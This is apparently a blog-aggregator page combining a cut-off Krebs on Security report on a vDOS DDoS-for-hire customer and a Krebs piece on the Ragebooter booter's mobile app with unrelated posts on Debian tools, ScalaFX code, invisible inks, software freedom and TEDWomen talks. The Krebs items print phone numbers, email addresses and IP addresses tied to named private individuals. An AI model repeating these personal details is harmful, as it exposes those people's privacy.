More importantly, prosecutors say, someone began taunting Washburn via Yahoo and Gmail messages while the attacks were underway, asking how everything was going at the company and whether the IT department needed any help.

“Also attached to this second email was an image of a mouse laughing,” the Justice Department indictment (PDF) alleges. “Grand jury subpoenas for subscriber information were subsequently served on Google…and Yahoo. Analysis of the results showed information connecting both accounts to an individual named John Gammell. Both email addresses were created using the cell phone number 612-205-8609.”

The complaint notes that the government subpoenaed AT&T for subscriber information and traced that back to Gammell as well, but phone number also is currently listed as the recovery number for a Facebook account tied to John K. Gammell.

That Facebook account features numerous references to the hacker collective known as Anonymous. This is notable because according to the government Gammell used two different accounts at vDOS: One named “AnonCunnilingus” and another called “anonrooster.” The email addresses this user supplied when signing up at vDOS (jkgammell@gmail.com and jkgammell@icloud.com) include other addresses quite clearly tied to multiple accounts for John K. Gammell.

John K. Gammell’s Facebook account.

Below is a snippet from a customer service ticket that the AnonCunnilingus account filed in Aug. 2015

“Dear Colleagues, this is Mr. Cunnilingus. You underestimate your capabilities. Contrary to your statement of “Notice!” It appears from our review that you are trying to stress test a DDoS protected host, vDOS stresser is not capable of taking DDoS protected hosts down which means you will not be able to drop this hosting using vDOS stresser…As they do not have my consent to use my internet, after their site being down for two days, they changed their IP and used rackspace DDoS mitigation and must now be removed from cyberspace. Verified by downbyeveryone. We will do much business. Thank you for your outstanding product 🙂 We Are Anonymous USA.”

Gammell has pleaded not guilty to the charges. He has not responded to requests for comment. The indictment states that Gammell allegedly attacked at least a half-dozen other companies over a year-long period between mid-2015 and July 2016, including several banks and two other companies at which he either previously worked or with whom he’d interviewed for a job.

In late July 2016, an anonymous security researcher reached out to KrebsOnSecurity to share a copy of the vDOS databases. The databases showed that vDOS made more than $600,000 in just two of the four years it was in operation, helping to launch more than 150,000 DDoS attacks.

Since then, two alleged co-owners of vDOS — two 19-year-old Israeli men —  have been arrested and charged with operating an attack-for-hire service. Aside from Gammell’s case, I am not aware of any other public cases involving the prosecution of people who allegedly used vDOS to conduct attacks.

But that will hopefully change soon, as there are countless clues about the identities of other high-volume vDOS users and their targets. Identifying the perpetrators in those cases should not be difficult because at some point vDOS stopped allowing users to log in to the service using a VPN, meaning many users likely logged into vDOS using an Internet address that can be traced back to them either via a home Internet or wireless account.

According to a review of the vDOS database, both accounts allegedly tied to Gammell were banned by vDOS administrators — either because he shared his vDOS username and password with another person, or because he logged on to the accounts with a VPN. Here’s a copy of a notice vDOS sent to AnonCunnilingus on July 28, 2015:

“Dear AnonCunnilingus , We have recently reviewed your account activity, and determined that you are in violation of vDos’s Terms of Service, It appears from our review that you have shared your account (or accessed vDos stresser from several locations and platforms) which is against our Terms of Services. Please refer to the following logs and terms:\n- AnonCunnilingus logged in using the following IPs: 64.145.76.110 (US), 85.10.210.199 (XX) date: 06-08-2015 18:05\n\n- 8) You are not allowed to access vDos stresser using a VPN/VPS/Proxy/RDP/Server Tunnelling and such.\n- 3) You may not share your account, if you will, your account will be closed without a warning or a refund!”

What’s most likely limiting prosecutors from pursuing more vDOS users is a lack of DDoS victims coming forward. In an advisory issued last month, the FBI urged DDoS victims to report the attacks.

The FBI requests DDoS victims contact their local FBI field office and/or file a complaint with the Internet Crime Complaint Center (IC3), regardless of dollar loss or timing of incident. Field office contacts can be identified at www.fbi.gov/contact-us/field. IC3 complaints should be filed at www.ic3.govwith the following details (if applicable):

  • Traffic protocol used by the DDoS (DNS, NTP, SYN flood, etc)
    • Attempt to preserve netflow and/or packet capture of the attack
  • Any extortion/threats pertaining to the DDoS attack
    • Save any such correspondence in its original, unforwarded format
  • Victim information
  • Overall losses associated with the DDoS attack
  • If a ransom associated with the attack was paid, provide transaction details, the subject’s email address, and/or crypto currency wallet address
  • Victim impact statement (e.g., impacted services/operations)
  • IP addresses used in the DDoS attack

Related reading:

How Not to DDoS Your Former Employer

Planet DebianWouter Verhelst: SReview 0.1

This morning I uploaded version 0.1 of SReview, my video review and transcoding system, to Debian experimental. There's still some work to be done before it'll be perfectly easy to use by anyone, but I do think I've reached the point by now where it should have basic usability by now.

Quick HOWTO for how to use it:

  • Enable Debian experimental
  • Install the packages sreview-master, sreview-encoder, sreview-detect, and sreview-web. It's possible to install the four packages on different machines, but let's not go into too much detail there, yet.
  • The installation will create an sreview user and database, and will start the sreview-web service on port 8080, listening only to localhost. The sreview-web package also ships with an apache configuration snippet that shows how to proxy it from the interwebs if you want to.
  • Run sreview-config --action=dump. This will show you the current configuration of sreview. If you want to change something, either change it in /etc/sreview/config.pm, or just run sreview-config --set=variable=value --action=update.
  • Run sreview-user -d --action=create -u <your email>. This will create an administrator user in the sreview database.
  • Open a webbrowser, browse to http://localhost:8080/, and test whether you can log on.
  • Write a script to insert the schedule of your event into the SReview database. Look at the debconf and fosdem scripts for inspiration if you need it. Yeah, that's something I still need to genericize, but I'm not quite sure yet how to do that.
  • Either configure gridengine so that it will have the required queues and resources for SReview, or disable the qsub commands in the SReview state_actions configuration parameter (e.g., by way of sreview-config --action=update --set=state_actions=... or by editing /etc/sreview/config.pm).
  • If you need notification, modify the state_actions entry for notification so that it sends out a notification (e.g., through an IRC bot or an email address, or something along those lines). Alternatively, enable the "anonreviews" option, so that the overview page has links to your talk.
  • Review the inputglob and parse_re configuration parameters of SReview. The first should contain a filesystem glob that will find your raw assets; the second should parse the filename into room, year, month, day, hour, minute, and second, components. Look at the defaults of those options for examples (or just use those, and store your files as /srv/sreview/incoming/<room>/<year>-<month>-<day>/<hour>:<minute>:<second>.*).
  • Provide an SVG file for opening credits, and point to it from the preroll_template configuration option.
  • Provide an SVG or PNG file for closing credits, and point to it from the postroll_template resp postroll configuration option.
  • Start recording, and watch SReview do its magic :-)

There's still some bits of the above list that I want to make easier to do, and there's still some things that shouldn't be strictly necessary, but all in all, I think SReview has now reached a certain level of maturity that means I felt confident doing its first upload to Debian.

Did you try it out? Let me know what you think!

CryptogramNew Research in Invisible Inks

It's a lot more chemistry than I understand:

Invisible inks based on "smart" fluorescent materials have been shining brightly (if only you could see them) in the data-encryption/decryption arena lately.... But some of the materials are costly or difficult to prepare, and many of these inks remain somewhat visible when illuminated with ambient or ultraviolet light. Liang Li and coworkers at Shanghai Jiao Tong University may have come up with a way to get around those problems. The team prepared a colorless solution of an inexpensive lead-based metal-organic framework (MOF) compound and used it in an ink-jet printer to create completely invisible patterns on paper. Then they exposed the paper to a methylammonium bromide decryption solution...revealing the pattern.... They rendered the pattern invisible again by briefly treating the paper with a polar solvent....

Full paper.

Worse Than FailureError'd: It Doesn't Mean What You Think it Means

"TRWTF here is I can't believe they shorted me on my change!" writes Diane B.

 

"I'm trying to order a shirt but I can't decide on which size to pick," writes Mark L., "I mean, is 03-XL bigger than 02-XL?"

 

Alex wrote, "So, Slack, exactly what would you say isn't working here?"

 

"I have a lot of questions about this agreement, but not nearly as many as it seems to have about itself," writes Dan B.

 

Josh writes, "Go figure. Here I thought 19 characters was between 6 and 30."

 

"Nevermind the national meterological services, Outlook has the most precise weather around!" wrote Kris L.

 

[Advertisement] Onsite, remote, bare-metal or cloud – create, configure and orchestrate 1,000s of servers, all from the same dashboard while continually monitoring for drift and allowing for instantaneous remediation. Download Otter today!

Planet DebianGuido Günther: git-buildpackage 0.9.2

After some time in the experimental distribution I've uploaded git-buildpackage 0.9.0 to sid a couple of weeks ago and were now at 0.9.2 as of today. This brought in two new commands:

  • gbp export-orig to regenerate tarballs based on the current version in debian/changelog. This was always possible by using gbp buildpackage and ignoring the build result e.g. gbp buildpackage --git-builder=/bin/true … but having a separate command is much more straight forward.

  • gbp push to push everything related to the current version in debian/changelog: debian-tag, debian-branch, upstream-branch, upstream-tag, pristine-tar branch. This could already be achieved by a posttag hook but having it separate is again more straight forward and reduces the numer of knobs one has to tweak.

We moved to better supported tools:

  • Switch to Python3 from Python2
  • Switch from epydoc to pydoctor
  • Finally switch from Docbook SGML to Docbook XML (we ultimately want to switch to Sphinx at one point but this will be much simpler now).

We added integration with pk4:

 mkdir -p ~/.config/pk4/hooks-enabled/unpack/
 ln -s /usr/share/pk4/hooks-available/unpack/gbp ~/.config/pk4/hooks-enabled/unpack/

so pk4 invokes gbp import-dsc on package import.

There were lots of improvements all over the place like gbp pq now importing the patch queue on switch (if it's not already there) and gbp import-dsc and import-orig not creating pointless master branches if debian-branch != 'master'. And after being broken in the early 0.9.x cycle gbp buildpackage --git-overlay ... should be much better supported now that we have proper tests.

All in all 26 bugs fixed. Thanks to everybody who contributed bug reports and fixes.

Don MartiWelcome Planet Mozilla readers

Welcome Planet Mozilla readers. (I finally figured out how to do a tagged feed for this blog, to go along with the full feed. So now you can get the items from the tagged feed on Planet Mozilla.)

The main feed has some items that aren't in the Mozilla feed.

Anyway, if you're coming to Austin, please mark your calendar now.

Two more links: I'm on Keybase and Mozillians. And @dmarti on Twitter.

Planet DebianNorbert Preining: ScalaFX: dynamic update of context menu of table rows

Context menus are useful to exhibit additional functionality. For my TLCockpit program I am listing the packages, updates, and available backups in a TreeTableView. The context for each row should be different depending on the status of the content displayed.

My first try, taken from searches on the web, was to add the context menu via the rowFactory of the TreeTableView:

table.rowFactory = { p =>
  val row = new TreeTableRow[SomeObject] {}
  val infoMI = new MenuItem("Info") { onAction = /* use row.item.value */ }
  val installMI = new MenuItem("Install") { onAction = /* use row.item.value */ }
  val removeMI = new MenuItem("Remove") { onAction = /* use row.item.value */ }
  val ctm = new ContextMenu(infoMI, installMI, removeMI)
  row.contextMenu = ctm
  row
}

This worked nicely until I tried to disable/enable some items based on the status of the displayed package:

  ...
  val pkg: SomeObject = row.item.value
  val isInstalled: Boolean = /* determine installation status of pkg */
  val installMI = new MenuItem("Install") { 
    disable = isInstalled
    onAction = /* use row.item.value */
  }

What I did here is just pull the shown package, get its installation status, and disable the Install context menu entry if it is already installed.

All good and fine I thought, but somehow reality was different. First there where NullPointerExceptions (rare occurrence in Scala for me), and then somehow that didn’t work out at all.

The explanation is quite simple to be found by printing something in the rowFactory function. There are only as many rows made as fit into the current screen size (plus a bit), and their content is dynamically updated when one scrolls. But the enable/disable status of the context menu entries were not properly updated.

To fix this one needs to add a callback on the displayed item, which is exposed in row.item. So the correct code is (assuming that a SomeObject has a BooleanProperty installed):

table.rowFactory = { p =>
  val row = new TreeTableRow[SomeObject] {}
  val infoMI = new MenuItem("Info") { onAction = /* use row.item.value */ }
  val installMI = new MenuItem("Install") { onAction = /* use row.item.value */ } 
  val removeMI = new MenuItem("Remove") { onAction = /* use row.item.value */ }
  val ctm = new ContextMenu(infoMI, installMI, removeMI)
  row.item.onChange { (_,_,newContent) =>
    if (newContent != null) {
      val isInstalled: /* determine installation status from newContent */
      installMI.disable = is_installed
      removeMI.disable = !is_installed
    }
  }
  row.contextMenu = ctm
  row
}

The final output then gives me:

That’s it, the context menus are now correctly adapted to the displayed content. If there is a simpler way, please let me know.

Krebs on SecurityDDoS-for-Hire Service Launches Mobile App

In May 2013 KrebsOnSecurity wrote about Ragebooter, a service that paying customers can use to launch powerful distributed denial-of-service (DDoS) attacks capable of knocking individuals and Web sites offline. The owner of Ragebooter subsequently was convicted in 2016 of possessing child pornography, but his business somehow lived on while he was in prison. Now just weeks after Poland made probation, a mobile version of the attack-for-hire service has gone up for sale on the Google Play store.

In the story Ragebooter: ‘Legit’ DDoS Service, or Fed Backdoor, I profiled then 19-year-old Justin D. Poland from Memphis — who admitted to installing code on his Ragebooter service that allowed FBI investigators to snoop on his customers.

Last February, Poland was convicted of one felony count of possession of child pornography, after investigators reportedly found 2,600 child pornography images on one of his computers. Before his trial was over, Poland skipped town but his bondsman later located him at his mother’s house. He was sentenced to two years in jail.

Poland did not respond to multiple requests for comment, but on his Facebook account Poland said the images belonged to his former roommate — David Starliper — who’d allegedly used Poland’s computer. Starliper also was convicted of possessing child pornography and sentenced to two years in prison.

In September 2017, Poland began posting on his Facebook account that he had made parole and was getting ready to be released from prison. On Oct. 6, the first version of the Android edition of Ragebooter was put on sale at Google’s Play Store.

The mobile version of Ragebooter.

Poland’s Facebook page says he is the owner of ragebooter[dot]com, ragebooter[dot]net, and another site called vmdeploy[net]. The advertisement for Ragebooter’s new mobile app on Google Play says the developer’s email address is contact@rageservices[dot]net. The registration details for rageservices[dot]net are hidden, but the Web site lists some useful contact details.

One of them is a phone number registered in Memphis — 901-219-3644 — that is tied to a Facebook account for an Alex Slovak in Memphis. The other domain Poland mentions on his Facebook page — vmdeploy[dot]net — was registered to an Alex Czech from Memphis. It seems likely that Alex has been running Ragebooter while Poland was in prison. Mr. Slovak/Czech did not respond to requests for comment, but it is clear from his Facebook page that he is friends with Poland’s family.

Rageservices[dot]net advertises itself as a store for custom programming and Web site development. Its content is identical to a site called QuantumServices. A small purchase through the rageservices[dot]net site for a simple program generated a response from Quantum Services and an email from quantumservicesweb@gmail.com. The person responding at that email address declined to give his or her name, but said they were not Justin Poland.

Figures posted to the home page of ragebooter[dot]net claim the service has been used to conduct more than 310,000 DDoS attacks. Memberships are sold in packages ranging from $3 per day to $300 a year for an “enterprise” plan. Ragebooter[dot]net includes a notice at the top of the site indicating that rageservices[dot]net is indeed affiliated with Ragebooter.

If Poland still is running Ragebooter, he may well be violating the terms of his parole. According to the FBI, the use of DDoS-for-hire services like Ragebooter is illegal.

In October the FBI released an advisory warning that the use of booter services — also called “stressers” — is punishable under the Computer Fraud and Abuse Act, and may result in arrest and criminal prosecution.

“Booter and stresser services are a form of DDoS-for-hire— advertised in forum communications and available on Dark Web marketplaces— offering malicious actors the ability to anonymously attack any Internet-connected target. These services are obtained through a monetary transaction, usually in the form of online payment services and virtual currency. Criminal actors running booter and stresser services sell access to DDoS botnets, a network of malware-infected computers exploited to make a victim server or network resource unavailable by overloading the device with massive amounts of fake or illegitimate traffic.”

Planet DebianThadeu Lima de Souza Cascardo: Software Freedom Strategy with Community Projects

It's been some time since I last wrote. Life and work have been busy. At the same time, the world has been busy, and as I would love to write a larger post, I will try to be short here. I would love to touch on the Librem 5 and postmarketOS. In fact, I had, in a podcast in Portuguese, Papo Livre. Maybe, I'll touch a little on the latter.

Some of the inspiration for this post include:

All of those led me to understand how software freedom is under attack, in particular how copyleft in under attack. And, as I talked during FISL, though many might say that "Open Source has won", end users software freedom has not. Lots of companies have co-opted "free software" but give no software freedom to their users. They seem friends with free software, and they are. Because they want software to be free. But freedom should not be a value for software itself, it needs to be a value for people, not only companies or people who are labeled software developers, but all people.

That's why I want to stop talking about free software, and talk more about software freedom. Because I believe the latter is more clear about what we are talking about. I don't mind that we use whatever label, as long as we stablish its meaning during conversations, and set the tone to distinguish them. The thing is: free software does not software freedom make. Not by itself. As Bradley Kuhn puts it: it's not magic pixie dust.

Those who have known me for years might remember me as a person who studied free software licenses and how I valued copyleft, the GPL specifically, and how I concerned myself with topics like license compatibility and other licensing matters.

Others might remember me as a person who valued a lot about upstreaming code. Not carrying changes to software openly developed that you had not made an effort to put upstream.

I can't say I was wrong on both accounts. I still believe in those things. I still believe in the importance of copyleft and the GPL. I still value sharing your code in the commons by going upstream. But I was certaily wrong in valuing them too much. Or not giving as much or even more value to distribution efforts of getting software freedom to the users.

And it took me a while in seeing how many people also saw the GPL as a tool to get code upstream. You see that a lot in Linus' discourse about the GPL. And that is on the minds of a lot of people, who I have seen argue that copyleft is not necessary for companies to contribute code back. But that's the problem. The point is not about getting code upstream. But about assuring people have the freedom to run a modified version of the software they received on their computers. It turns out that many examples of companies who had contributed code upstream, have not delivered that freedom to their end-users, who had received a modified version of that same software, which is not free.

Bradley Kuhn also alerts us that many companies have been replacing copyleft software with non-copyleft software. And I completely agree with him that we should be writing more copyleft software that we hold copyright for, so we can enforce it. But looking at what has been happening recently in the Linux community about enforcement, even thought I still believe in enforcement as an strategy, I think we need much more than that.

And one of those strategies is delivering more free software that users may be able to install on their own computers. It's building those replacements for software that people have been using for any reason. Be it the OS they get when they buy a device, or the application they use for communication. It's not like the community is not doing it, it's just that we need to acknowledge that this is a necessary strategy to guarantee software freedom. That distribution of software that users may easily install on their computers is as much or even more valuable than developing software closer to the hacker/developer community. That doing downstream changes to free software in the effort of getting them to users is worth it. That maintaining that software stable and secure for users is a very important task.

I may be biased when talking about that, as I have been shifting from doing upstream work to downstream work and both on the recent years. But maybe that's what I needed to realize that upstreaming does not necessarily guarantees that users will get software freedom.

I believe we need to talk more about that. I have seen many people dear to me disregard that difference between the freedom of the user and the freedom of software. There is much more to talk about that, go into detail about some of those points, and I think we need to debate more. I am subscribed to the libreplanet-discuss mailing list. Come join us in discussing about software freedom there, if you want to comment on anything I brought up here.

As I promised I would, I would like to mention about postmarketOS, which is an option users have now to get some software freedom on some mobile devices. It's an effort I wanted to build myself, and I applaud the community that has developed around it and has been moving forward so quickly. And it's a good example of a balance between upstream and dowstream code that gets to deliver a better level of software freedom to users than the vendor ever would.

I wanted to write about much of the topics I brought up today, but postponed that for some time. I was motivated by recent events in the community, and I am really disappointed at some the free software players and some of the events that happened in the last few years. That got me into thinking in how we need to manifest ourselves about those issues, so people know how we feel. So here it is: I am disappointed at how the Linux Foundation handled the situation about Software Freedom Conversancy taking a case against VMWare; I am disappointed about how Software Freedom Law Center handled a trademark issue against the Software Freedom Conservancy; and I really appreciate all the work the Software Freedom Conservancy has been doing. I have supported them for the last two years, and I urge you to become a supporter too.

Planet Linux AustraliaOpenSTEM: This Week in HASS – term 4, week 6

This week our youngest students are starting work on their Class Play, slightly older students are choosing a family group from around the world for a role play activity and our oldest students are holding a Class Election! What an activity-filled week! Foundation/Prep/Kindy to Year 3 Our youngest students in standalone Foundation/Prep/Kindy classes (Unit F.4) […]

,

CryptogramHacking a Fingerprint Biometric

Embedded in this story about infidelity and a mid-flight altercation, there's an interesting security tidbit:

The woman had unlocked her husband's phone using his thumb impression when he was sleeping...

TEDFearless risk-taking: Notes from Session 4 of TEDWomen 2017: Suspend

Jacqueline Novogratz hosts this session of TEDWomen 2017 — about the risks we take to create the world we want. . Photo: Stacie McChesney / TED

The suspension bridge, says Acumen founder and session host Jacqueline Novogratz, provides the perfect metaphor for the leadership we need to see in this “fractured, divided, too often cynical world.” Why? Because its structure balances a strong, deep, unwavering foundation with its ability to stretch across vast distances to connect and bring close. That’s precisely what we need to see in today’s moral leaders, says Novogratz. And that’s what we’re set to hear in this TEDWomen session, “Suspend.”

Shameem Akhtar is an education activist in her home of Pakistan, where she advocates for the education of women and girls. She speaks at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

To learn is to be free. Shameem Akhtar lived as a boy for most of her childhood, due to her uncle’s savvy thinking around the oppressive restrictions often placed on girls in their native Pakistani culture. She experienced the privileges and freedoms of being a boy — playing outside and, most important, going to school. An immutable passion was lit to study and learn, and be free, and she fought both to attend university and to take a job, in a culture where most women are expected to stay home. And then a funny thing happened; people noticed she was sending money home. “Over time, other parents begin sending their daughters to school,” she says. “Today, not a single girl from my village is out of school.” Change is slow and there is still much work to be done, but Akhtar is now a passionate advocate for girls’ rights and education. “The road is not easy, the destination is not close, but I have dreams in my eyes and I am not going to look back now,” she concludes, to great applause from an appreciative audience. (Note: this is Akhtar’s first visit to the United States. She arrived in New Orleans on Halloween. Talk about culture shock.)

Lera Boroditsky studies how our language habits shape how we think and see the world, sharing amazing examples from many cultures. She speaks at TEDWomen 2017 in New Orleans. Photo: Ryan Lash

Does language shape how we think? Globally, there are about 7,000 languages spoken, all with different sounds, vocabularies and structures. “It begs the question, does the language we speak shape the way we think?” asks cognitive scientist Lera Boroditsky. It’s a long-standing (like, thousands of years), ongoing debate, but Boroditsky shares five examples from new research suggesting that the answer is … yes. For example, the Pormpuraaw, an Aboriginal tribe in Australia, use cardinal directions instead of words like left or right, helping them to stay better oriented than we used to think humans ever could be. “The beauty of linguistic diversity is that it reveals to us just how ingenious and how flexible the human mind is,” says Boroditsky. “Human minds have invented not one cognitive universe, but 7,000.”

Turning prison into a bridge to a better life. Six years ago, Teresa Njoroge was convicted of a financial crime — the end of a long string of false accusations against her, increasing attempts to bribe her, and a corrupt justice system in her home in Kenya. As the gates of Langata Women Maximum Prison closed behind her, she knew she was in for the toughest year of her life. But what she did not expect, she says, was the women, and their stories, she encountered there. “I realized,” she said, “that it wasn’t crime that put these women in prison. Far from it. It begun with lack of education, whose supply and quality is not equal for all, and a lack of economic opportunities, which pushes them to petty survival crimes.” Once she got out, she co-founded Clean Start, an organization that helps women and men of Kenya reconnect with life and opportunities after serving prison time. “We cheer them on,” she says, and “we never lose sight of who they are: men and women full of unleashed potential.”

“You Found Me.” Cellist and chanteuse Helen Gillet mixes her classical training, New Orleans-based jazz roots and free improvisational skills to perform her own eclectic musical fusion. Her powerful and innovative performance provides a dreamy, melodious change of pace for the audience.

Dixon Chibanda speaks from a Friendship Bench — a community-based mental health tool that brings care to thousands of people in Zimbabwe. Photo: Ryan Lash / TED

Granny power. Dixon Chibanda used to be a rock star, but he’s here to share thoughts and insights as one of Zimbabwe’s 12 psychiatrists. That’s right. 12 — for a population of some 14 million. Realizing, sadly, that the country would never be able to scale traditional methods to treat those with mental health issues, Chibanda helped to develop a beautiful solution powered by a limitless resource. In 2006, he launched friendship benches, (wo)manned by grandmothers who are trained in evidence-based talk therapy (and themselves supported via their mobile phones). People who want to talk, are directed to seek their first line of treatment at a local bench. It’s so simple — and it works. “Today, hundreds of highly competent grandmothers who understand the basics of cognitive behavior therapy are working in over 70 communities across the country,” says Chibanda: More than 30,000 people received treatment at a friendship bench in Zimbabwe last year. Extraordinary.

Let’s talk shit (to solve our sanitation problems). Lindsay Stradley says our collective squeamishness at talking about waste is causing huge problems. For instance, not having an adult word for “poop” greatly diminishes our ability to talk responsibly or effectively about sewage and waste systems. She outlines how her Nairobi-based organization, Sanergy, uses an economic sanitation solution model that puts money back into the pockets of the citizens, dignity back into the hearts of those living in areas with poor sanitation and a lack of clean, safe toilets — and takes waste out of communities for the greater good.

Steph Speirs is a solar entrepreneur whose own story upends the stereotypes about business leaders. She speaks at TEDWomen 2017 in New Orleans. Photo: Stacie McChesney / TED

Entrepreneurship that chips away at inequality. “My mom taught us that the American Dream wasn’t about the acquisition of stuff,” says solar entrepreneur Steph Speirs. “The American Dream was about choice, the choice to choose what you want to do — and with that choice comes dignity.” Many of the world’s most intractable problems, however, come down to a lack of choice. Consider energy. “Most people don’t think clean energy is an option,” she says, but the reality is that the cost of solar is lower than it’s ever been and could save people money if they could just access it. “The people who need energy savings the most, low-income renters like my mom, they’re going to be the least likely to get it right now,” she says. Through her company Solstice, Speirs and her colleagues are trying to get solar power to every American. “We can use our knowledge, our words and our time to chip away at inequality,” she says.

What’s your Ironman? Born in Bombay, Minda Dentler contracted polio before her first birthday, paralyzing her from the hips down. Adopted by an American family, she moved to Spokane, Washington, where she received medical treatment to walk with braces — and to learn she could do almost anything she could set her mind to. Which might be why, as an adult, she decided to compete in the Ironman triathlon in Kona, Hawaii: a 2.4-mile swim, a 112-mile bike ride, followed up with a full 26.2-mile marathon. Her first attempt was technically a failure … and a year later, she came back and completed the race. “For the first time in its 35-year history, a female wheelchair athlete completed the Ironman World Championship. It wasn’t just any female athlete; it was me, a paralyzed orphan from India,” she says. Having conquered both Kona and polio, she now has a new Ironman ahead: attempting to eradicate the disease that paralyzed her.

Minda Dentler conquered the legendary Ironman triathlon in Kona, Hawaii — and now she’s set to conquer polio. She speaks at TEDWomen 2017 in New Orleans. Photo: Stacie McChesney / TED


TEDThe power of showing up: Notes from Session 1 of TEDWomen 2017: Build

Vocalist Deborah Cox and the Lake Area Girls Choir blow the roof off to kick-start TEDWomen 2017: Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans. Photo: Stacie McChesney / TED

“We build them, we cross them, sometimes we burn them.” TED Content Director Kelly Stoetzel kicks off TEDWomen 2017 with an explanation of how she and conference curator Pat Mitchell developed this year’s rich conference theme, Bridges. “Over the next three days we’ll hear talks from artists and architects, entrepreneurs, scientists and activists,” she continues — the usual TED fare, in other words, given a special TEDWomen twist. In this session, “Build,” we find ideas of power, empathy, ingenuity and radical humanity, to name a few. So let’s get cracking.

Hosts Pat Mitchell and Kelly Stoetzel kick off TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

I’m every woman. This fall, the powerhouse vocalist Deborah Cox is starring in the national tour of The Bodyguard, a musical based on a movie starring the late great Whitney Houston, who sings a song first popularized by the great Chaka Khan that was co-written by the songwriting legend Valerie Simpson (of Ashford & Simpson)  … That chain of strong women’s voices just got 50 voices stronger, as Cox opens with a stunning take on “I’m Every Woman,” joined by the young women of the Lake Area Girls Choir. Their combined voices rock the audience right out of their seats, echoing up through the balconies of the historic Orpheum Theater.

Be the first domino. Self-proclaimed professional troublemaker Luvvie Ajayi tamed her fears by conquering them in the boldest ways possible — deep-sea diving, skydiving and ziplining across forests. In this, the first full talk of the conference, she encourages others to do the same, to be the first domino causing a chain reaction. “Being the first domino is doing or saying what is difficult, because that is usually when it’s needed,” she says. However, she adds, we can’t simply rely on those who have traditionally spoken up and out to ignite social change. Instead, she call for us all to fearlessly embrace who we are as a revolutionary act, to become fellow troublemakers and speak truth to power despite trepidation.

Why did Luvvie Ajayi jump out of a “perfectly good plane,” she asks? To face her fear in the boldest way possible. She speaks at TEDWomen 2017: Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans, Louisiana. Photo: Ryan Lash / TED

Footbridges that connect people with opportunity. Avery Louise Bang found her calling when she traveled in Fiji as a college student and saw communities mired in isolation because of the rivers, canyons or peaks separating them from the rest of the world. Without an easy way to cross these expanses, people struggled to send their kids to school or reach medical care. Bang resolved to help, and studied engineering before joining the Denver-based nonprofit Bridges to Prosperity, which has now built 270 bridges in more than 20 countries, connecting nearly a million people. But their work, she emphasizes, is less about constructing spans of steel, stone and mortar and more about transforming lives by giving them access to a larger world. She calls on countries and philanthropists to prioritize connecting the estimated one billion people on the planet still stranded due to geography. As she says: “Poverty due to rural isolation is a crisis we can solve in our lifetime.”

Avery Bang builds bridges — literal ones, that link isolated villages to schools, health care and markets. She speaks at TEDWomen 2017: Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans, Louisiana. Photo: Ryan Lash / TED

Justice has geography too. Liz Ogbu is a trained architect, but she likes to say she works in spatial justice. What’s that, you ask? Well, she says, it’s a way to remember that all too often justice is impacted by geography. That’s right, she’s talking about gentrification — from the perspective of those displaced by it, not those looking to “fix” it. Ogbu questions the troubling assumption that some people (traditionally the poor or disenfranchised) will inevitably be pushed out when development and progress come knocking. “Why is it we treat culture erasure and economic displacement as inevitable?” she asks feistily. Instead, developers, architects, designers and policy makers must think differently about development, to “make a commitment to build people’s capacity to stay … to stay in their homes, to stay in their communities, to stay where they feel whole.”

Can we heal the Gulf of Mexico? Tonight, ocean expert Nancy Rabelais is speaking onstage; by Friday she’ll be back at work, diving the Gulf of Mexico to track the ominously named Dead Zone — a zone without enough oxygen in the water to support life. The Gulf has the second largest Dead Zone in the world, the size of New Jersey (“not to brag,” says Nancy), and on top of killing fish and crustaceans, it’s killing the traditional fisheries in these waters. Here’s the troubling reality: the Dead Zone is caused mainly by excessive nitrogen and phosphorous, the Mississippi-borne runoff of corn and soybean farms hundreds of miles upstream. How to help US Midwestern farmers care about shrimp fisheries in the Gulf? By speaking out and showing the connection between algae-poisoned water in Toledo, Ohio and the dying life on the bottom of the Gulf. Nancy is working to build across-the-aisle support for cleaning up the Gulf’s waters and restoring one of America’s treasures.

When Nancy Rabalais dives in the Gulf of Mexico, she sees the “dead zone” effects of farm techniques far upstream. She speaks at TEDWomen 2017: Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans, Louisiana. Photo: Ryan Lash / TED

Justice is our responsibility. The United States incarcerates more people than any other country in the world, says Eve Abrams, producer of Unprisoned, a podcast about the prison system. However, between one and four percent of those in prison are likely innocent. That’s 87,000 brothers, sisters, mothers, and fathers — predominantly African American — unnecessarily separated from their families, their lives and dreams put on hold. Using audio footage from her interviews, Abrams shares the touching stories of those with incarcerated family members, and calls for us all to take a stand to ensure that the justice system ultimately works for everyone. “Justice is hard to come by,” she says. “If we don’t like what’s going on, it’s up to us to change it.”

Helping every mother have a healthy birth Christy Turlington Burns remembers the moment her just-born daughter was placed in her arms for the first time, a magical moment that was quickly shattered when her third stage of labor (when the placenta expels) did not go as planned. Surrounded by the best medical care, she lost almost a quart of blood as doctors and nurses worked to resolve her condition. She’s fine now — in fact, she was home with her baby within 24 hours. But as she found out, what happened to her is one of the leading causes of maternal death in the world. Burns resolved to help. Her nonprofit, Every Mother Counts, targets maternal health in a number of straightforward, practical ways. None of this is a mystery — we know how to help moms survive childbirth, and most of the interventions are low-cost and proven. Now we must find the will to do them, for every mother in the world.

Where to begin. Artist and poet Cleo Wade recites a moving poem about being an advocate for love and acceptance in a time when both seem in short supply. Interwoven with stories of individuals at the beginning or end of their lives, she shares the inherent truths that come with aging and reflects in the wisdom of a life well-lived. Wade leaves the stage with a simple yet enduring takeaway: be good to yourself, be good to others, be good to the Earth. “The world will say to you / ‘Be a better person’/ Don’t be afraid to say yes,” she says.

That’s it from TEDWomen for tonight. Up tomorrow, a whole host of more extraordinary stories and insightful ideas. Stay tuned, and night from New Orleans.


TEDThe power of partnership: Notes from Session 3 of TEDWomen … Connect

Life partners Chris Waddell and Jean Oelwang are hosts of Session 3, an exploration of partnerships. They kick off the session at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

